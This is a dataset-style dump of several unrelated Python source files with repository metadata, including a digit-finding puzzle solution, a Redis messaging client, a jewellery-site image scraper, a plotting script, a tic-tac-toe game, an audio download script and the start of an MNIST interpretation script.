def findNthDigit(self, n):
"""
:type n: int
:rtype: int
"""
if n < 10:
return n
maxBits = 1
for i in range(1, 11):
numberInbitsI = (10 ** i - 10 ** (i - 1)) * i
if n <= numberInbitsI:
maxBits = i
break
n -= numberInbitsI
i = (n - 1) // maxBits
j = (n - 1) % maxBits
target = 10 ** (maxBits - 1) + i
print('n maxBits i j target\n', n, maxBits, i, j, target)
return int(str(target)[j])
print(Solution().findNthDigit(194))
| 0 | 559 | 22 |
8064cb779b30bc7cc41fa4ed8c9047964653750a | 5,132 | py | Python | python/bridge.py | bmilde/ambientsearch | 74bf83a313e19da54a4e44158063041f981424c9 | [
"Apache-2.0"
] | 20 | 2016-04-30T11:24:45.000Z | 2021-11-09T10:39:25.000Z | python/bridge.py | bmilde/ambientsearch | 74bf83a313e19da54a4e44158063041f981424c9 | [
"Apache-2.0"
] | 1 | 2020-09-23T13:36:58.000Z | 2020-09-23T13:36:58.000Z | python/bridge.py | bmilde/ambientsearch | 74bf83a313e19da54a4e44158063041f981424c9 | [
"Apache-2.0"
] | 8 | 2015-10-07T13:40:36.000Z | 2019-08-07T06:45:24.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde'
import requests
import json
import redis
import re
from timer import Timer
red = redis.StrictRedis()
#Todo: refactor. This has been mved to the relevant event generator
#Abstracts away the details of communicating with the ambient server
#Do most of the message passing with redis, now standard version | 43.863248 | 211 | 0.67537 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde'
import requests
import json
import redis
import re
from timer import Timer
red = redis.StrictRedis()
#Todo: refactor. This has been mved to the relevant event generator
def idFromTitle(title):
return re.sub(r'[^\w]', '_', title.replace(' ','_'))
#return title.replace(' ','_').replace("'",'_').replace('(','_')
#Abstracts away the details of communicating with the ambient server
class KeywordClientHttp():
def __init__(self,server_url):
self.server_url = server_url
self.request_header = {'Content-type': 'application/json', 'Accept': 'text/plain'}
def getSettings(self):
r = requests.get(self.server_url+'getSettings')
return r.json()
def addRelevantEntry(self, type, title, text, url, score, insert_before):
data = {'handle':'addRelevantEntry','type':type,'entry_id': idFromTitle(title),'title':title,'text':text,'url':url,'score':score, 'insert_before': insert_before}
r = requests.post(self.server_url+'addRelevantEntry', data=json.dumps(data), headers=self.request_header)
return r.status_code
def delRelevantEntry(self, type, title):
data = {'handle':'delRelevantEntry','type':type,'title': title, 'entry_id': idFromTitle(title)}
r = requests.post(self.server_url+'delRelevantEntry', data=json.dumps(data), headers=self.request_header)
return r.status_code
def addUtterance(self, utterance,speaker):
data = {'handle':'addUtterance','utterance':utterance,'speaker':speaker}
r = requests.post(self.server_url+'addUtterance', data=json.dumps(data), headers=self.request_header)
return r.status_code
def replaceLastUtterance(self, old_utterance,new_utterance,speaker):
data = {'handle':'replaceLastUtterance','old_utterance':old_utterance,'utterance':new_utterance,'speaker':speaker}
r = requests.post(self.server_url+'replaceLastUtterance', data=json.dumps(data), headers=self.request_header)
return r.status_code
def completeUtterance(self, utterance, speaker):
data = {'handle':'completeUtterance','utterance':utterance,'speaker':speaker}
red.publish('ambient_transcript_only', json.dumps(data))
def reset(self):
data = {'handle':'reset'}
red.publish('ambient_transcript_only', json.dumps(data))
r = requests.post(self.server_url+'reset', data=json.dumps(data), headers=self.request_header)
return r.status_code
#Do most of the message passing with redis, now standard version
class KeywordClient():
def __init__(self,server_url=""):
self.server_url = server_url
self.request_header = {'Content-type': 'application/json', 'Accept': 'text/plain'}
self.timer_started = False
self.timer = Timer()
def checkTimer(self):
if not self.timer_started:
self.timer.start()
self.timer_started = True
def resetTimer(self):
self.timer_started = False
self.timer.start()
def getSettings(self):
r = requests.get(self.server_url+'getSettings')
return r.json()
def sendCategories(self, categories):
data = {'handle':'setCategories', 'categories':categories}
red.publish('ambient', json.dumps(data))
def addRelevantEntry(self, type, title, text, url, score, insert_before):
self.checkTimer()
data = {'handle':'addRelevantEntry','type':type,'entry_id': idFromTitle(title),'title':title,'text':text,'url':url,'score':score, 'insert_before': insert_before, 'time': float(self.timer.current_secs())}
print data
red.publish('ambient', json.dumps(data))
def delRelevantEntry(self, type, title):
self.checkTimer()
data = {'handle':'delRelevantEntry','type':type,'title': title, 'entry_id': idFromTitle(title), 'time': float(self.timer.current_secs())}
red.publish('ambient', json.dumps(data))
def addUtterance(self, utterance, speaker):
self.checkTimer()
data = {'handle':'addUtterance','utterance':utterance,'speaker':speaker, 'time': float(self.timer.current_secs())}
red.publish('ambient', json.dumps(data))
def replaceLastUtterance(self, old_utterance, new_utterance, speaker):
self.checkTimer()
data = {'handle':'replaceLastUtterance','old_utterance':old_utterance,'utterance':new_utterance,'speaker':speaker, 'time': float(self.timer.current_secs())}
red.publish('ambient', json.dumps(data))
def completeUtterance(self, utterance, speaker):
self.checkTimer()
data = {'handle':'completeUtterance','utterance':utterance,'speaker':speaker , 'time': float(self.timer.current_secs())}
print data
red.publish('ambient_transcript_only', json.dumps(data))
def reset(self):
data = {'handle':'reset'}
red.publish('ambient_transcript_only', json.dumps(data))
self.resetTimer()
r = requests.post(self.server_url+'reset', data=json.dumps(data), headers=self.request_header)
return r.status_code | 4,147 | 6 | 595 |
e5971ec81aae8b6929e0ae0e93757b73ff60b49f | 5,052 | py | Python | data_code/image_scraping.py | natashanorsker/fagprojekt | ef9a8cc2128c43d891c8a7a47e14916af2b9c602 | [
"MIT"
] | 1 | 2021-02-15T08:08:38.000Z | 2021-02-15T08:08:38.000Z | data_code/image_scraping.py | natashanorsker/fagprojekt | ef9a8cc2128c43d891c8a7a47e14916af2b9c602 | [
"MIT"
] | 3 | 2021-02-24T10:43:41.000Z | 2021-06-21T12:54:51.000Z | data_code/image_scraping.py | natashanorsker/fagprojekt | ef9a8cc2128c43d891c8a7a47e14916af2b9c602 | [
"MIT"
] | 1 | 2021-02-15T10:50:19.000Z | 2021-02-15T10:50:19.000Z | # imports
import requests
import json
from bs4 import BeautifulSoup
from tqdm import tqdm
import random
from utilities import dict_from_json
#websites: (these are the websites with the same format as UK)
#does not work:
#'https://us.pandora.net/en/jewelry/?start={}&sz=36&format=page-element''
websites = ['https://cn.pandora.net/zh/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://jp.pandora.net/ja/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nz.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://sg.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://dk.pandora.net/da/smykker/?start={}&sz=36&format=page-element',
'https://de.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://fr.pandora.net/fr/bijoux/?start={}&sz=36&format=page-element',
'https://it.pandora.net/it/gioielli/?start={}&sz=36&format=page-element',
'https://uk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nl.pandora.net/nl/sieraden/?start={}&sz=36&format=page-element',
'https://pl.pandora.net/pl/bizuteria/?start={}&sz=36&format=page-element',
'https://se.pandora.net/sv/smycken/?start={}&sz=36&format=page-element',
'https://at.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element']
headers = ['Mozilla/5.0 CK={} (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148']
if __name__ == "__main__":
new_catalog = create_catalog(save=True, websites=websites)
has_no_class = dict_from_json('id_not_in_masterfile.json')
for product in has_no_class:
if product in new_catalog.keys():
new_catalog.pop(product)
a_file = open("../catalog.json", "w")
json.dump(new_catalog, a_file)
a_file.close() | 45.513514 | 207 | 0.617973 | # imports
import requests
import json
from bs4 import BeautifulSoup
from tqdm import tqdm
import random
from utilities import dict_from_json
#websites: (these are the websites with the same format as UK)
#does not work:
#'https://us.pandora.net/en/jewelry/?start={}&sz=36&format=page-element''
websites = ['https://cn.pandora.net/zh/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://jp.pandora.net/ja/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nz.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://sg.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://dk.pandora.net/da/smykker/?start={}&sz=36&format=page-element',
'https://de.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://fr.pandora.net/fr/bijoux/?start={}&sz=36&format=page-element',
'https://it.pandora.net/it/gioielli/?start={}&sz=36&format=page-element',
'https://uk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nl.pandora.net/nl/sieraden/?start={}&sz=36&format=page-element',
'https://pl.pandora.net/pl/bizuteria/?start={}&sz=36&format=page-element',
'https://se.pandora.net/sv/smycken/?start={}&sz=36&format=page-element',
'https://at.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element']
headers = ['Mozilla/5.0 CK={} (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148']
def create_catalog(websites, save=True):
new_catalog = {}
for site in tqdm(websites, desc='For every site'):
s = requests.Session()
s.headers['User-Agent'] = random.choice(headers)
s.max_redirects = 60
product_urls = {}
#just get the start site in order to look up total products on the site
a = s.get(site.format('0'))
start = BeautifulSoup(a.content, 'lxml')
total_products = int(start.find('input', id='products_count')['value'])
products_per_page = int(start.find('input', id='pageload_product_count')['value'])
# get info on all products and their primary image url:
for page in range(0, total_products, products_per_page):
j = s.get(site.format(page))
jewellery = BeautifulSoup(j.content, 'lxml')
product_list = jewellery.find_all('input', class_='product-details', attrs={"value": True})
for item in product_list:
info_dict = json.loads(item['value'])
if info_dict["product_id"] in new_catalog:
pass
else:
new_catalog[info_dict["product_id"]] = info_dict
product_urls[info_dict["product_id"]] = info_dict['product_url']
# get all images for every product:
for iD, url in tqdm(product_urls.items(), desc='Collecting all new image urls', leave='False'):
product_site = s.get(url)
product = BeautifulSoup(product_site.content, 'lxml')
# list of image_urls
image_list = product.find_all('a', class_='main-image', attrs={'href': True})
url_list = []
for item in image_list:
url_list.append(item['href'])
# find all the spin360 images:
spin360 = product.find_all('img', class_='spin-reel', attrs={'data-frames': True, 'data-images': True})
if spin360:
# get every other spin360 image (all of them are too much)
for frame in range(1, int(spin360[0]['data-frames']), 2):
i = str(frame).zfill(2)
url_list.append(spin360[0]['data-images'].replace("##", i))
new_catalog[iD]['product_image_url'] = url_list
if save:
a_file = open("../catalog.json", "w")
json.dump(new_catalog, a_file)
a_file.close()
return new_catalog
if __name__ == "__main__":
new_catalog = create_catalog(save=True, websites=websites)
has_no_class = dict_from_json('id_not_in_masterfile.json')
for product in has_no_class:
if product in new_catalog.keys():
new_catalog.pop(product)
a_file = open("../catalog.json", "w")
json.dump(new_catalog, a_file)
a_file.close() | 2,435 | 0 | 23 |
2dffac327b451073edbc101c6a98c989c4acd12b | 7,900 | py | Python | AnalyzeLazyTime.py | pirtim/complex_networks_sim | f669c83439d9386d1f4e33bcb60f16f0dac7278d | [
"MIT"
] | null | null | null | AnalyzeLazyTime.py | pirtim/complex_networks_sim | f669c83439d9386d1f4e33bcb60f16f0dac7278d | [
"MIT"
] | null | null | null | AnalyzeLazyTime.py | pirtim/complex_networks_sim | f669c83439d9386d1f4e33bcb60f16f0dac7278d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division #~ Domysle dzielenie int jako liczb float
# from igraph import * #~ Niepotrzebne
import random #~ Niepotrzebne
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt #~ Do wykresow
from matplotlib import rc
import time #~ Niepotrzebne
import os.path #~ Do sprawdzania istnienia plikow
import numpy as np #~ Do operacjach na array
import cPickle as pickle
import json
from FilesManagment import CheckFolder, CompressData
from PIL import Image
#~ Funkcja bierze liste i odwraca tam gdzie sa mniejsze niz 0.5
#~ Funkcja bierze liste i przedloza ja zerami lub jedynkami do zadanej wielkosci
if __name__ == '__main__':
# skrypt do analizowania przejscia fazowego
rc('font', family='Arial') #Plotowanie polskich liter
#~ Definicje stalych symulacji
stg = {
# 'CONST_CLIQUE' : 3, #~ Wielkosc kliki
'CONST_VERTICES' : 1000, #~ Ilosc wezlow
'CONST_OVERRIDEN' : False, #~ Czy ma nadpisywac pliki podczas zapisywania wynikow
'CONST_DUMP' : True, # czy ma zrzucac wektory wynikow
# 'CONST_PATH_BASIC_FOLDER' : 'Wyniki_barabasi_lazy_fazowe',
'CONST_PATH_BASIC_FOLDER' : 'Wyniki_lazy_meanK',
'CONST_MEAN_k' : 22.0,
'CONST_PATH_WYK' : 'time_dla_er_lazy_fazowe_k8',
'CONST_FAZOWE' : False,
'CONST_START_MAGNETIZATION' : 0.5
}
analyze(stg)
| 42.934783 | 139 | 0.630759 | # -*- coding: utf-8 -*-
from __future__ import division #~ Domysle dzielenie int jako liczb float
# from igraph import * #~ Niepotrzebne
import random #~ Niepotrzebne
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt #~ Do wykresow
from matplotlib import rc
import time #~ Niepotrzebne
import os.path #~ Do sprawdzania istnienia plikow
import numpy as np #~ Do operacjach na array
import cPickle as pickle
import json
from FilesManagment import CheckFolder, CompressData
from PIL import Image
def crop_image(filepath):
image=Image.open(filepath)
image.load()
image_data = np.asarray(image)
image_data_bw = image_data.min(axis=2)
non_empty_columns = np.where(image_data_bw.min(axis=0)<255)[0]
non_empty_rows = np.where(image_data_bw.min(axis=1)<255)[0]
cropBox = (min(non_empty_rows), max(non_empty_rows), min(non_empty_columns), max(non_empty_columns))
image_data_new = image_data[cropBox[0]:cropBox[1]+1, cropBox[2]:cropBox[3]+1 , :]
new_image = Image.fromarray(image_data_new)
new_image.save(filepath)
#~ Funkcja bierze liste i odwraca tam gdzie sa mniejsze niz 0.5
def OdwrocMniejsze(lista):
retlista = np.array(lista)
if retlista[-1] < 0.5:
retlista = 1 - retlista
# [1-x for x in lista]
return list(retlista)
#~ Funkcja bierze liste i przedloza ja zerami lub jedynkami do zadanej wielkosci
def PrzedlozDo(lista, doIle):
lenLista = len(lista)
if lista[-1] > 0.995:
return np.pad(lista, (0,doIle - lenLista),'constant', constant_values=(1))
else:
return np.pad(lista, (0,doIle - lenLista),'constant', constant_values=(0))
def plotuj(stg, data, type_plot):
fig = plt.figure()
if type_plot == 'hist':
plt.hist(data, bins=80, normed = True)
plt.grid(True)
# plt.hist(data, bins = 20, normed = True, log = True, histtype = 'step')
elif type_plot == 'hist_log':
plt.hist(data, bins=np.logspace(1, 4, 40), normed = True)
plt.gca().set_xscale("log")
plt.gca().set_yscale("log")
plt.grid(True)
# plt.hist(data, bins = 20, normed = True, log = True, histtype = 'step')
elif type_plot == 'dirr':
plt.plot(data.keys(), data.values(), 'o')
elif type_plot == 'log_norm':
print np.log(np.array(data))
plt.hist(np.log(np.array(data)), bins=40, normed = True)
plt.grid(True)
else:
raise ValueError
plt.ylabel(u'Prawdopodobieństwo $P_T(t)$')
plt.xlabel(u'Zlogarytmowany krok symulacji w liczbach $N$')
# fig.suptitle('Histogram czasu trwania symulacji - {}.'.format(type_plot))
plt.title(u'Rozkład zlogarytowanych czasów relaksacji dla modelu ,,leniwego\'\'')
fig.savefig(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']+'_{}'.format(type_plot) + '.png'), dpi = 200)
print 'Plotted to: {}'.format(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']+'_{}'.format(type_plot) + '.png'))
fig.clf()
crop_image(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']+'_{}'.format(type_plot) + '.png'))
def check_folder_k(spin, path_file, basic_dir, stg):
path_k = os.path.join(basic_dir, path_file, 'k{}'.format(spin))
result = 0
if os.path.exists(path_k):
for path_opis in filter(lambda name: name.endswith('.json'), os.listdir(path_k)):
with open(os.path.join(path_k, path_opis), 'r') as f:
dic = json.load(f)
if dic['CONST_VERTICES'] == stg['CONST_VERTICES'] and dic['WYN_meanG'] == stg['WYN_meanG']:
result += 1
return result
def check_folder_simple(path_file, basic_dir, stg):
path = os.path.join(basic_dir, path_file)
up, down = 0, 0
if os.path.exists(path):
for path_opis in filter(lambda name: name.endswith('.json'), os.listdir(path)):
with open(os.path.join(path, path_opis), 'r') as f:
dic = json.load(f)
if dic['CONST_VERTICES'] == stg['CONST_VERTICES'] and dic['CONST_MEAN_k'] == stg['CONST_MEAN_k']:
if dic['WYN_M'] == 0:
down += 1
elif dic['WYN_M'] == 1:
up += 1
return down, up
def check_file(dic, stg):
stan = True
if 'CONST_VERTICES' in stg:
if 'CONST_VERTICES' not in dic:
return False
stan = stan and stg['CONST_VERTICES'] == dic['CONST_VERTICES']
if 'CONST_MEAN_k' in stg:
if 'CONST_MEAN_k' not in dic:
return False
stan = stan and stg['CONST_MEAN_k'] == dic['CONST_MEAN_k']
if 'CONST_START_MAGNETIZATION' in stg:
if 'CONST_START_MAGNETIZATION' not in dic:
return False
stan = stan and stg['CONST_START_MAGNETIZATION'] == dic['CONST_START_MAGNETIZATION']
# if not stan and dic['CONST_VERTICES'] == 10000:
# print dic
return stan
def check_folder_time(wyn_xy, wyn_x, path_file, basic_dir, stg):
path = os.path.join(basic_dir, path_file)
if os.path.exists(path):
for path_opis in filter(lambda name: name.endswith('.json'), os.listdir(path)):
with open(os.path.join(path, path_opis), 'r') as f:
dic = json.load(f)
if dic['CONST_SIM_LONG']*dic['CONST_VERTICES'] != dic['WYN_j']+1 and check_file(dic, stg):
time = int(dic['WYN_j']/dic['CONST_VERTICES'])
wyn_x.append(time)
if time in wyn_xy:
wyn_xy[time] += 1
else:
wyn_xy[time] = 1
def analyze(stg):
stg['CONST_STANDARD_PATH_ANALYZE'] = os.path.join(stg['CONST_PATH_BASIC_FOLDER'], 'analyze')
CheckFolder(stg['CONST_STANDARD_PATH_ANALYZE'])
stg['CONST_SHORT_RAW_PATH'] = os.path.join(stg['CONST_PATH_BASIC_FOLDER'], 'RawDataMag')
wyn_xy = {}
wyn_x = []
# x, y = [], []
basic_dir = stg['CONST_SHORT_RAW_PATH']
if 'CONST_FAZOWE' in stg and stg['CONST_FAZOWE']:
for path_file in sorted(os.listdir(basic_dir)):
basic_dir_inner = os.path.join(basic_dir, path_file)
for path_file_inner in sorted(os.listdir(basic_dir_inner)):
check_folder_time(wyn_xy, wyn_x, path_file_inner, basic_dir_inner, stg)
for path_file in sorted(os.listdir(basic_dir)):
check_folder_time(wyn_xy, wyn_x, path_file, basic_dir, stg)
# H:\Dropbox\Studia\licencjat\Symulacje2016.07.07\complex_networks_sim\Wyniki_lazy_fazowe\RawDataMag\val_start_0.50000
if stg['CONST_DUMP']:
CompressData(wyn_xy, os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']), pickling=True)
with open(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK'] + '.data') , 'w') as f:
f.writelines(str(wyn_xy))
print len(wyn_x)
print sorted(wyn_xy.iteritems(), key=lambda (x, y): x)
plotuj(stg, wyn_xy, 'dirr')
plotuj(stg, wyn_x, 'hist')
plotuj(stg, wyn_x, 'hist_log')
plotuj(stg, wyn_x, 'log_norm')
if __name__ == '__main__':
# skrypt do analizowania przejscia fazowego
rc('font', family='Arial') #Plotowanie polskich liter
#~ Definicje stalych symulacji
stg = {
# 'CONST_CLIQUE' : 3, #~ Wielkosc kliki
'CONST_VERTICES' : 1000, #~ Ilosc wezlow
'CONST_OVERRIDEN' : False, #~ Czy ma nadpisywac pliki podczas zapisywania wynikow
'CONST_DUMP' : True, # czy ma zrzucac wektory wynikow
# 'CONST_PATH_BASIC_FOLDER' : 'Wyniki_barabasi_lazy_fazowe',
'CONST_PATH_BASIC_FOLDER' : 'Wyniki_lazy_meanK',
'CONST_MEAN_k' : 22.0,
'CONST_PATH_WYK' : 'time_dla_er_lazy_fazowe_k8',
'CONST_FAZOWE' : False,
'CONST_START_MAGNETIZATION' : 0.5
}
analyze(stg)
| 6,187 | 0 | 212 |
3406049335d99d644917125e8b716c8c4bbe412b | 4,174 | py | Python | tic-tac-toe.py | RuTh-git/Tic-tac-toe-project | 8a7f7720b91ca7f519c5fd66925ef154aa938142 | [
"MIT"
] | null | null | null | tic-tac-toe.py | RuTh-git/Tic-tac-toe-project | 8a7f7720b91ca7f519c5fd66925ef154aa938142 | [
"MIT"
] | null | null | null | tic-tac-toe.py | RuTh-git/Tic-tac-toe-project | 8a7f7720b91ca7f519c5fd66925ef154aa938142 | [
"MIT"
] | null | null | null | # -------Global Variables---------
# Game board
board =["-","-","-",
"-","-","-",
"-","-","-",]
# If game is still going
game_still_going = True
# Who won? Or tie?
winner = None
# Whos turn is it
current_player = "X"
# Display board
# Play a game of tic tac toe
# Handle a single turn of an arbitrary player
play_game()
# board
# display board
# play game
# handle turn
# check win
# check rows
# check columns
# check diagonals
# check tie
# flip player
| 20.766169 | 74 | 0.626977 | # -------Global Variables---------
# Game board
board =["-","-","-",
"-","-","-",
"-","-","-",]
# If game is still going
game_still_going = True
# Who won? Or tie?
winner = None
# Whos turn is it
current_player = "X"
# Display board
def display_board():
print("\n")
print(board[0] + " | " + board[1] + " | " + board[2])
print(board[3] + " | " + board[4] + " | " + board[5])
print(board[6] + " | " + board[7] + " | " + board[8])
print("\n")
# Play a game of tic tac toe
def play_game():
# Display initial board
display_board()
# While the game is still going
while game_still_going:
# handle a single turn of an arbitrary player
handle_turn(current_player)
# check if the game has ended
check_if_game_over()
# Flip to the other player
flip_player()
# The game has ended
if winner == "X" or winner == "O":
print(winner + " won.")
elif winner == None:
print("Tie.")
# Handle a single turn of an arbitrary player
def handle_turn(player):
print(player + "'s turn.")
print("\n")
position = input("Choose a position from 1-9: ")
valid = False
while not valid:
while position not in ["1", "2", "3", "4", "5", "6", "7", "8", "9"]:
position = input("Choose a position from 1-9: ")
position = int(position) - 1
if board[position] == "-":
valid = True
else:
print("You can't go there. Go again.")
print("\n")
board[position] = player
display_board()
def check_if_game_over():
check_for_winner()
check_if_tie()
def check_for_winner():
# Set up global Variables
global winner
# check rows
row_winner = check_rows()
# check columns
column_winner = check_columns()
# check diagonals
diagonal_winner = check_diagonals()
if row_winner:
winner = row_winner
elif column_winner:
winner = column_winner
elif diagonal_winner:
winner = diagonal_winner
else:
winner = None
return
def check_rows():
# Set up global variables
global game_still_going
# check if any of the rows have all the same value (and is not empty)
row_1 = board[0] == board[1] == board[2] != "-"
row_2 = board[3] == board[4] == board[5] != "-"
row_3 = board[6] == board[7] == board[8] != "-"
# If any row does have a match, flag that there is a win
if row_1 or row_2 or row_3:
game_still_going = False
# Return the winner (X or O)
if row_1:
return board[0]
elif row_2:
return board[3]
elif row_3:
return board[6]
return
def check_columns():
# Set up global variables
global game_still_going
# check if any of the columns have all the same value (and is not empty)
column_1 = board[0] == board[3] == board[6] != "-"
column_2 = board[1] == board[4] == board[7] != "-"
column_3 = board[2] == board[5] == board[8] != "-"
# If any column does have a match, flag that there is a win
if column_1 or column_2 or column_3:
game_still_going = False
# Return the winner (X or O)
if column_1:
return board[0]
elif column_2:
return board[1]
elif column_3:
return board[2]
return
def check_diagonals():
# Set up global variables
global game_still_going
# check if any of the columns have all the same value (and is not empty)
diagonal_1 = board[0] == board[4] == board[8] != "-"
diagonal_2 = board[6] == board[4] == board[2] != "-"
# If any column does have a match, flag that there is a win
if diagonal_1 or diagonal_2:
game_still_going = False
# Return the winner (X or O)
if diagonal_1:
return board[0]
elif diagonal_2:
return board[6]
return
def check_if_tie():
global game_still_going
if "-" not in board:
game_still_going = False
return
def flip_player():
# global variables we need
global current_player
# if the current player was x, then change it to O
if current_player == "X":
current_player = "O"
# If the current player was O, then change it to X
elif current_player == "O":
current_player = "X"
return
play_game()
# board
# display board
# play game
# handle turn
# check win
# check rows
# check columns
# check diagonals
# check tie
# flip player
| 3,449 | 0 | 227 |
8c4cc89a3ae7d346b023dc93a3ae432c4760b998 | 1,560 | py | Python | preprocessing/audio_download/helperfiles/audio_download.py | sereini/SpeechSeparationModel | ea44c845762112f3bc2e5e54c5530e6fd429464f | [
"MIT"
] | 3 | 2019-12-05T10:22:19.000Z | 2021-11-08T12:19:54.000Z | preprocessing/audio_download/helperfiles/audio_download.py | sereini/SpeechSeparationModel | ea44c845762112f3bc2e5e54c5530e6fd429464f | [
"MIT"
] | null | null | null | preprocessing/audio_download/helperfiles/audio_download.py | sereini/SpeechSeparationModel | ea44c845762112f3bc2e5e54c5530e6fd429464f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 17:34:23 2019
@author: chalbeisen
This program is to download audios. The required arguments are set by the
powershell script "Run-audio_download.ps1".
"""
from LookingToListen_Audio_clean import Audio
import argparse
import sys
'''
------------------------------------------------------------------------------
desc: get parameters from script "Run-audio_download.ps1"
param:
argv: arguments from script "Run-audio_download.ps1"
return: parsed arguments
------------------------------------------------------------------------------
'''
'''
------------------------------------------------------------------------------
desc: run audio download
param:
argv: arguments from script "Run-audio_download.ps1"
return: -
------------------------------------------------------------------------------
'''
if __name__== "__main__":
main(parse_arguments(sys.argv[1:])) | 31.836735 | 79 | 0.525 | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 17:34:23 2019
@author: chalbeisen
This program is to download audios. The required arguments are set by the
powershell script "Run-audio_download.ps1".
"""
from LookingToListen_Audio_clean import Audio
import argparse
import sys
'''
------------------------------------------------------------------------------
desc: get parameters from script "Run-audio_download.ps1"
param:
argv: arguments from script "Run-audio_download.ps1"
return: parsed arguments
------------------------------------------------------------------------------
'''
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--dir', type=str,
help='Define directory of audios', default='audio/audio_speech')
parser.add_argument('--start', type=int,
help='Define start index of audio download', default=0)
parser.add_argument('--stop', type=int,
help='Define start index of audio download', default=123800)
return parser.parse_args(argv)
'''
------------------------------------------------------------------------------
desc: run audio download
param:
argv: arguments from script "Run-audio_download.ps1"
return: -
------------------------------------------------------------------------------
'''
def main(argv):
audio = Audio()
audio.download_speech(argv.dir, argv.start, argv.stop)
if __name__== "__main__":
main(parse_arguments(sys.argv[1:])) | 508 | 0 | 58 |
897df636f8322f5671a5d204f36d6950b78f524e | 4,566 | py | Python | ex_simulation/mnist_based/cd_interp_nmf.py | csinva/transformation-importance | 256ebdb7c05bcc34c8f8bdbbdd0a09dc3585ea0e | [
"MIT"
] | 6 | 2020-03-05T14:44:09.000Z | 2021-12-14T12:28:24.000Z | ex_simulation/mnist_based/cd_interp_nmf.py | csinva/transformation-importance | 256ebdb7c05bcc34c8f8bdbbdd0a09dc3585ea0e | [
"MIT"
] | null | null | null | ex_simulation/mnist_based/cd_interp_nmf.py | csinva/transformation-importance | 256ebdb7c05bcc34c8f8bdbbdd0a09dc3585ea0e | [
"MIT"
] | 2 | 2020-04-23T19:29:38.000Z | 2021-07-12T19:45:55.000Z | import numpy as np
import matplotlib.pyplot as plt
import torch
import random
device = 'cuda' if torch.cuda.is_available() else 'cpu'
from scipy.ndimage import gaussian_filter
import sys
from tqdm import tqdm
from functools import partial
import acd
from copy import deepcopy
sys.path.append('../..')
sys.path.append('../../..')
from transforms_torch import bandpass_filter
# plt.style.use('dark_background')
sys.path.append('../../../dsets/mnist')
import dset
from model import Net, Net2c
from util import *
from numpy.fft import *
from torch import nn
from style import *
from captum.attr import (
InputXGradient,
Saliency,
GradientShap,
DeepLift,
DeepLiftShap,
IntegratedGradients,
LayerConductance,
NeuronConductance,
NoiseTunnel,
)
import pickle as pkl
from torchvision import datasets, transforms
from sklearn.decomposition import NMF
import transform_wrappers
import visualize as viz
from model import Net, Net2c
torch.manual_seed(42)
np.random.seed(42)
from acd_wooseok.acd.scores import cd
from acd_wooseok.acd.util import tiling_2d
from acd_wooseok.acd.scores import score_funcs
from torchvision import datasets, transforms
# import modules
from funcs import *
from matfac import *
sys.path.append('../../../..')
from hierarchical_dnn_interpretations.acd.scores import cd as acd
# load args
args = dset.get_args()
args.batch_size = int(args.batch_size/2) # half the batchsize
args.epochs = 50
args.cuda = not args.no_cuda and torch.cuda.is_available()
# load mnist dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size, args.test_batch_size, device)
# dataset
X = train_loader.dataset.data.numpy().astype(np.float32)
X = X.reshape(X.shape[0], -1)
X /= 255
Y = train_loader.dataset.targets.numpy()
X_test = test_loader.dataset.data.numpy().astype(np.float32)
X_test = X_test.reshape(X_test.shape[0], -1)
X_test /= 255
Y_test = test_loader.dataset.targets.numpy()
# load NMF object
# run NMF
# nmf = NMF(n_components=30, max_iter=1000)
# nmf.fit(X)
# pkl.dump(nmf, open('./results/nmf_30.pkl', 'wb'))
nmf = pkl.load(open('../results/nmf_30.pkl', 'rb'))
D = nmf.components_
